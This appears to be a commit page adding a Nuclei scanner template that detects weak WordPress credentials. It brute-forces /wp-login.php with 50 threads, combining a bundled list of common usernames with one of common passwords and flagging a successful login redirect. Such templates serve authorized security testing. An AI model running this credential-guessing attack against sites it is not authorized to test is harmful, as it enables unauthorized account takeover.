Merge pull request #2465 from projectdiscovery/wordpress-weak-credentials
Added WordPress Weak Credentials Detectionpatch-1
commit
d9ec41e2e5
|
@ -0,0 +1,37 @@
|
|||
id: wordpress-weak-credentials
|
||||
|
||||
info:
|
||||
name: WordPress Weak Credentials
|
||||
author: evolutionsec
|
||||
severity: critical
|
||||
tags: wordpress,default-login,fuzz
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
log={{users}}&pwd={{passwords}}
|
||||
|
||||
payloads:
|
||||
users: helpers/wordlists/wp-users.txt
|
||||
passwords: helpers/wordlists/wp-passwords.txt
|
||||
threads: 50
|
||||
attack: clusterbomb
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '/wp-admin'
|
||||
- 'wordpress_logged_in'
|
||||
condition: and
|
||||
part: header
|
|
@ -0,0 +1,23 @@
|
|||
admin
|
||||
123456
|
||||
password
|
||||
12345678
|
||||
666666
|
||||
111111
|
||||
1234567
|
||||
qwerty
|
||||
siteadmin
|
||||
administrator
|
||||
root
|
||||
123123
|
||||
123321
|
||||
1234567890
|
||||
letmein123
|
||||
test123
|
||||
demo123
|
||||
pass123
|
||||
123qwe
|
||||
qwe123
|
||||
654321
|
||||
loveyou
|
||||
adminadmin123
|
|
@ -0,0 +1,11 @@
|
|||
adm
|
||||
admin
|
||||
user
|
||||
admin1
|
||||
hostname
|
||||
manager
|
||||
qwerty
|
||||
root
|
||||
support
|
||||
sysadmin
|
||||
test
|
Loading…
Reference in New Issue